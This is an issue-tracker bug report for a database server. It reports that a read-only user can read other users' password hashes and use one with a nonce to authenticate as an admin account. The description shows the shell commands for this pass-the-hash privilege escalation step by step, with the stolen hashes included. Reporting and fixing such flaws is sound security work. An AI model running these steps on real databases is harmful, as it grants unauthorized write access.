Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-6031

read only user can get write priority

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical - P2
    • Resolution: Duplicate
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security
    • Labels:
      None
    • Environment:
      all
    • Operating System:
      ALL

      Description

      read only user can get write priority by access other users's pwd hash

      sample:
      > db.system.users.find()

      { "_id" : ObjectId("4fd068ae34ae311cd063f9b2"), "user" : "sa", "readOnly" : false, "pwd" : "84c689ded211fb631fd5f5dedc5d4539" } { "_id" : ObjectId("4fd07496cf5f726c2428ac3a"), "user" : "ro", "readOnly" : true, "pwd" : "d8883d4475561e209dda05a54a98c8f6" }

      > db.$cmd.findOne(

      {getnonce:1}

      )

      { "nonce" : "9892be9572e9851e", "ok" : 1 }

      > db.runCommand(

      { authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") }

      )

      { "ok" : 1 }

        Attachments

          Issue Links

            Activity

              People

              Assignee:
              Unassigned Unassigned
              Reporter:
              syre xie zhenye
              Participants:
              Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

                Dates

                Created:
                Updated:
                Resolved: